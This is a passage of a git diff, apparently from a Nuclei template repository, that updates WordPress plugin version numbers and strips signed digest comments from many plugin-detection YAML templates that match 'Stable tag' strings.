http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 216 files changed, 17 insertions(+), 217 deletions(-) diff --git a/helpers/wordpress/plugins/advanced-custom-fields.txt b/helpers/wordpress/plugins/advanced-custom-fields.txt index f9da12e118..d9b300f1c8 100644 --- a/helpers/wordpress/plugins/advanced-custom-fields.txt +++ b/helpers/wordpress/plugins/advanced-custom-fields.txt @@ -1 +1 @@ -6.3.2 \ No newline at end of file +6.3.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/backwpup.txt b/helpers/wordpress/plugins/backwpup.txt index 99eba4de93..cd9b8f559e 100644 --- a/helpers/wordpress/plugins/backwpup.txt +++ b/helpers/wordpress/plugins/backwpup.txt @@ -1 +1 @@ -4.1.0 \ No newline at end of file +4.1.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/custom-post-type-ui.txt b/helpers/wordpress/plugins/custom-post-type-ui.txt index 73d74673c7..507266ba01 100644 --- a/helpers/wordpress/plugins/custom-post-type-ui.txt +++ b/helpers/wordpress/plugins/custom-post-type-ui.txt @@ -1 +1 @@ -1.17.0 \ No newline at end of file +1.17.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/duplicator.txt b/helpers/wordpress/plugins/duplicator.txt index 66e67504fc..0edd95ce64 100644 --- a/helpers/wordpress/plugins/duplicator.txt +++ b/helpers/wordpress/plugins/duplicator.txt @@ -1 +1 @@ -1.5.9 \ No newline at end of file +1.5.10 \ No newline at end of file diff --git a/helpers/wordpress/plugins/happy-elementor-addons.txt b/helpers/wordpress/plugins/happy-elementor-addons.txt index 7a8265660d..f4687fd4f7 100644 --- a/helpers/wordpress/plugins/happy-elementor-addons.txt +++ b/helpers/wordpress/plugins/happy-elementor-addons.txt @@ -1 +1 @@ -3.11.1 \ No newline at end of file +3.11.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/kadence-blocks.txt b/helpers/wordpress/plugins/kadence-blocks.txt index 96395c56fd..494bf99a9c 100644 --- a/helpers/wordpress/plugins/kadence-blocks.txt +++ b/helpers/wordpress/plugins/kadence-blocks.txt @@ -1 +1 @@ -3.2.46 \ No newline at end of file +3.2.47 \ No newline at end of file diff --git a/helpers/wordpress/plugins/loginizer.txt b/helpers/wordpress/plugins/loginizer.txt index 9eadd6baad..d2c4b27150 100644 --- a/helpers/wordpress/plugins/loginizer.txt +++ b/helpers/wordpress/plugins/loginizer.txt @@ -1 +1 @@ -1.8.6 \ No newline at end of file +1.8.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/newsletter.txt b/helpers/wordpress/plugins/newsletter.txt index f413137528..7857a9473e 100644 --- a/helpers/wordpress/plugins/newsletter.txt +++ b/helpers/wordpress/plugins/newsletter.txt @@ -1 +1 @@ -8.4.1 \ No newline at end of file +8.4.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/post-smtp.txt b/helpers/wordpress/plugins/post-smtp.txt index e3bed5e1c4..daf077f9e0 100644 --- a/helpers/wordpress/plugins/post-smtp.txt +++ b/helpers/wordpress/plugins/post-smtp.txt @@ -1 +1 @@ -2.9.5 \ No newline at end of file +2.9.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/royal-elementor-addons.txt b/helpers/wordpress/plugins/royal-elementor-addons.txt index fcba8f8322..5a34f27cf4 100644 --- a/helpers/wordpress/plugins/royal-elementor-addons.txt +++ b/helpers/wordpress/plugins/royal-elementor-addons.txt @@ -1 +1 @@ -1.3.978 \ No newline at end of file +1.3.979 \ No newline at end of file diff --git a/helpers/wordpress/plugins/safe-svg.txt b/helpers/wordpress/plugins/safe-svg.txt index 047615559c..ecf00d9019 100644 --- a/helpers/wordpress/plugins/safe-svg.txt +++ b/helpers/wordpress/plugins/safe-svg.txt @@ -1 +1 @@ -2.2.4 \ No newline at end of file +2.2.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/the-events-calendar.txt b/helpers/wordpress/plugins/the-events-calendar.txt index c6888be8e6..a40131b61d 100644 --- a/helpers/wordpress/plugins/the-events-calendar.txt +++ b/helpers/wordpress/plugins/the-events-calendar.txt @@ -1 +1 @@ -6.5.1.4 \ No newline at end of file +6.5.1.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt index 3a37f70b27..e02b2e809e 100644 --- a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt +++ b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt @@ -1 +1 @@ -2.13.7 \ No newline at end of file +2.13.8 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-super-cache.txt b/helpers/wordpress/plugins/wp-super-cache.txt index 6f165bc1b0..69669de698 100644 --- a/helpers/wordpress/plugins/wp-super-cache.txt +++ b/helpers/wordpress/plugins/wp-super-cache.txt @@ -1 +1 @@ -1.12.1 \ No newline at end of file +1.12.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wpforms-lite.txt b/helpers/wordpress/plugins/wpforms-lite.txt index 75632c69da..b262ed2849 100644 --- a/helpers/wordpress/plugins/wpforms-lite.txt +++ b/helpers/wordpress/plugins/wpforms-lite.txt @@ -1 +1 @@ -1.8.9.2 \ No newline at end of file +1.8.9.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wps-hide-login.txt b/helpers/wordpress/plugins/wps-hide-login.txt index 49b85c1cc7..d211fdcac3 100644 --- a/helpers/wordpress/plugins/wps-hide-login.txt +++ b/helpers/wordpress/plugins/wps-hide-login.txt @@ -1 +1 @@ -1.9.16.6 \ No newline at end of file +1.9.16.7 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index dcf6a2f207..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022055566c4623d686a16d4f86d99792e3aa6aa8af3ccb59b3cba44f5bc1ad10d981022100e48ff56de14ed536dcabaf0a09813dd7f06e96b4e3afa099e633b3ecf32f0700:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 7200024b1d..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204a9446dd9a0558178f4fec26847303b2b6911fc3b20049eda8d5aa54c0d719a702210088e9197271e8ba6a715193e272b699b82833a7ccbdd21efc9a059e2bc2bd1e84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index cf72bca806..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203db7bb6216e88b31f64e40d64d4e7c6d55240a6667c73f481baacc454796526c02200269d4e5db78cf76b847646cfe5b0e3ec5f4a780e720d20311d0a6f090efff40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index d01f514084..cddbb4bb2e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022075d56f81aac1ecf7fabe4c5bbb137dfaaa5c4b286cfb749e17681dca6637d0cd02205b68f490a5de62086abaf8687fc85e5fab718d5b75adcba78561182a8f48b3ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 0142a17b72..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d1a370d4914b5d1e8977dc24ab53e6476b924f95739794dd514534d18706af1c022051a9842d3917e906fd87b094e0c24021152f39c347cdd1a1d5b01444e078f1cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 14c4c8afee..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022029e0af2f625fc595852b23b8c3baa5e8d7ce0bec2be63d2c5e92a138ce69e480022100a6ab1c9b4aa2d2212832af0a819a2487e2443062e9a15691911b2ecd5600ebbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 79dbf1440b..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210085faca8c6e3fe54d54a094d61356919702a4fcbb0862f01dcaf1b41e8677a432022100d841c25cb2bfb5788f09cfd1b57b520b960b1a7dbe1ba37466754a9ab7a21992:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index ab7690af8c..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207d73d293594ef539fc9947cc56eb900c3ffcb2ba59000798f7bb96c2b04c8b88022100a75b3f79175aca9a6180faf9401f7a33c5af51f99fb34b08adae8ab9e642bc65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 57a44a17ec..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207329efd3629c3d19a73a1c643a27747fb6a44ded3c5d15f4dde74b5d24842ad4022100fb36d14c29e3a13910d7ef437c4e85d139b2d29aea7347f4dfeac0347595a5d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 783ee1ba01..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100abb5d47df32501c9c8e1c39374db7226dd067cd090e9d2ad1e3709f9946e720d0220382abe5a00e295ee4f46a786f1956888362ebe9f14885cbd3f61c83235eac1d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 9a69afe069..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d972a0d33a23fa2d318d6d5f73b744d3876c8652d14d7bc6080bf924bca96dc80221008f444a11e9e00f8229930fabbf01bc00ee00612a082b3fa350640a93b42c831e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index fc868a5328..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022029bdf5c027942a5950140a29c91b85f8482cf068b4f1c2716f7794b3fd371f0e022004696d9bd0d37ef296d2afb2bbe3b582a5eda301715567ec3afc8a1c085a31cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index cb7bf94762..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -1,7 +1,7 @@ id: wordpress-backwpup info: - name: BackWPup – WordPress Backup Plugin | Easy Backup & Restore Detection + name: BackWPup – WordPress Backup & Restore Plugin Detection author: ricardomaia severity: info reference: @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c836836edbdc596ea5dd503208051890c4a44e3f954d7e1439730a4bd97f71cf02207f88ab1a20b7cb34da15d688c537a5d0bc4fab5df36ecf410cb26724a91dccb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 8c63dad6a7..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d3648f99fcf8055b1320056f143cb650aca612edabe88637806c8809c04103f80221009d7aae109d8d1f1a4977249ebcd7a4130419f28e6a528e77a5572f609dea322e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 5b7f39809f..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b6e1e440205bbbcaa2afc194634ff6eb150034ce7d12ad1ab7e7ffb6640e31e7022100e1c7464386302d635a2d324d240c50f9bb344596a3ae34b4ad62b3849a263495:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 6b012098d0..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200bc916f42e57d211cc229cb489b90d9eeb13e516f5e30e1a78023004d69401330221008bd921dbc9298bebd721e1bbca4996870c059867258c39ec3cd17033495531dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 39c11e76cb..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e88d0869485693426907b30fefbea2eba1a6b54fd4f0cbb85dbda62576aac5a9022100826ebf407f1a0556e598958d41d995e86d4f7d189e4d164f4b4f075b3b0d4285:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 2c1110e729..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206428633a42ba20e622d3c5b8a0d9d87e5f0fa81c0816718eb680bd9b0666f2cc0220265aa1a44aad2d7a980ea68fe2aff87b00add9eb982935cea051d51e03b73344:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index b3efd70abc..f8691caf0a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e99f2909ec3264c6dd6b0185b692bf06cfdfad2b6f2dbaaede355698ba306ddd022100baf923e46dd043f8265f179d2808169d414fa32fe53d6835a07faddc93e06332:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index cc2dac2bd2..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022018971ebb6113f98cd1e241ddf9b6a015d75cd95f068c22bb5ead36793c5303ff0220222ce6f3898e9598b4ffb7dd48114fadc001ba539a7cd5356b3a207aa4647504:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 462d413dfb..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206f7af1083bffb359e0f8669a6652f858a5491ce386105f2915b35f7ebc8936840220221146a4c5764567fc17b6729438cd0d720e4bed8b8c44d8602e835716d6258d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 84e8c5f533..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f0331540f2bf3711631d04da2d01724efc7d369ff778bde61ef8f0d310d677fe022100ead2ab5349b1ce2e9110ecfaf04d1860bdcf25230c6be5541856a93823fc69f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 4c5ec0d3d0..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a60ff9bd9943bfc391879ed87fa9b9af5be94a609294c5e28301d7a377e43299022054d57adb5caa68af75e832ab76f053346443b442b4b175b7ade6a14d04bd9790:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 90a55a5408..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200d07399e42a4da5cd82a11fe45af67e11acc629567a401b2d09105d57dabf67c02207f4012cfcdb2726f547ab4ef9249d28b2a2e7f1efd368e16ece43f0bb45561f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index d09e29abbb..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220654e26bd5f2282e4d2310e85a538a35b40b22ada0dfb846060883c8697096dd00220755649112e73593588585463737c4ef08a0c0115e28ae499319a8f8e98bbd173:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 5f06ab27a3..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b25531e294b56c840c8202030e17c21fbe4e26490cf90e8b1b766fe171fabf6e02207e235b9a4b7a9b4965b27d3984453aaa7f1dddfc9cd6b9e63a9655aaffbb27ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 8543ae0256..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207cd6aba5f660b954126cb3d56f4045dcea1f14613116d56310829d489dc33fd5022100afaffc113205787a2a6b76212a1c894bc6fec44b548fba91e67212e1612c8430:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d3495be568..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202c1aa3a279d5ec3dfd5ab56ab21cd0f43dd8b59f1ea938dafea500e8f9171f1a022100f515f3b5ef579c38afbac7caeb70ea4b6b9d09c19863d55cfb3598c92c931ddb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 5019ee23a7..4afaf9dc97 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022012a1ef5b4c5becf58fb1005964203c0463d989dd691fe31fe18760111e527714022100b26eb9edc76bd9ab2004508628729aa8d1cc981a2b33dcfc7f90f7bbe24724ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 250c40601d..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bf100126554901b1e59b95906644dbd4ee552c722013eea66a8270c5582e1c7b022100d4fc4d85d70ee8a495e8e5cf0bb4b5188ac69fdf695f583d3a8b61d38e4a33da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 73b471a762..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b00b06a6db3db470720d28e56daf34a53fc6c57d1b701ad6988c5b5399fc6efe022100b7c72ae4ef2a96c74c5289a6b31294fbaae7baed041ff9caaa9ae26075ed1cd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 223a17db71..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a7b4bf80cfe1199490edd26d74e487850e9e1d428a3c9e2a4a04584e752d0f9d02200492e40a1de0d3695e6ad88ebb0a3176f564a831bc2bcd2ab1495bc3ed4aa792:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 4082dd2a82..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f0ac7a862bf807dd2fd3d0287dbffd4519a6476034b65e40348bf7ee9a986abd02207adc74550186b862d544ee6f337a8e94871ab231c640c7b2a59585d4f22bebf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index 89235dd0f8..bca0326f2b 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210082a78843c11ff0a919c23129fc71f921b12f3612274eb62c846b524c68b4b72a0220075e4010d26195346172eade5cb744bffffd0e4aa2cf29faa87d88b874335dba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 85aa3626f1..854328f04b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201dd0b8d8b8e39156985dd5b4e78df2a45cbd33e4532fdf74c3149396e3f6c34f022100c14c65963a17e1cd23b423fc680d0eaaecf665c95ef00b14765b350615d898aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index fe453fb2f0..6d3f7f4566 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 